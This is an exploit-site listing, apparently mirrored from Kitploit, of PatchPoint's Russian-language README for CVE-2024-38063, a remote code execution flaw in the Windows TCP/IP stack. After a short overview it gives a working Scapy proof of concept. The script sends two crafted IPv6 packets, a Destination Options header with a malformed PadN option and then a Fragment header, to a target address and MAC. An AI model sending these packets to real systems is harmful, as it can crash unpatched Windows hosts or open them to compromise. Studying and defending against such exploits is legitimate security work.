Sploitus

Exploit for CVE-2024-38063

kitploit · 2026-08-27

Exploit Code

MARKDOWN23 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PATCHPOINT-CVE-2024-38063
# CVE-2024-38063

## Обзор

В августе 2024 года Microsoft выпустила патч для уязвимости удалённого выполнения кода (RCE) в Windows TCP/IP. Некоторые исследователи уже опубликовали Proofs of Concept (PoC) для этой уязвимости, и примерно в то же время исследователи PatchPoint также завершили свой анализ и воспроизведение данной проблемы. Из-за распространения дезинформации на различных платформах, включая Twitter, похоже, что ключевые моменты, необходимые для эксплуатации этой уязвимости, были поняты неправильно. Вопреки этим неточностям, мы решили выпустить PoC, демонстрирующий, как эту уязвимость можно проэксплуатировать с помощью передачи всего двух пакетов. В действительности, для эксплуатации этой уязвимости не требуется большого количества пакетов.

## PoC

root@kitploit:~
    
    
    from scapy.all import *
    IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
    MACAddr = '' # XX:XX:XX:XX:XX:XX
    ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
    ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
    sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)
    

## PCAP

![pcap](https://assets.kitploit.com/production/public/readmes/30526/75d74c0444af5bd6e52dc4140f884773aa280bcd1d1761fdaee37ef309d998de.png)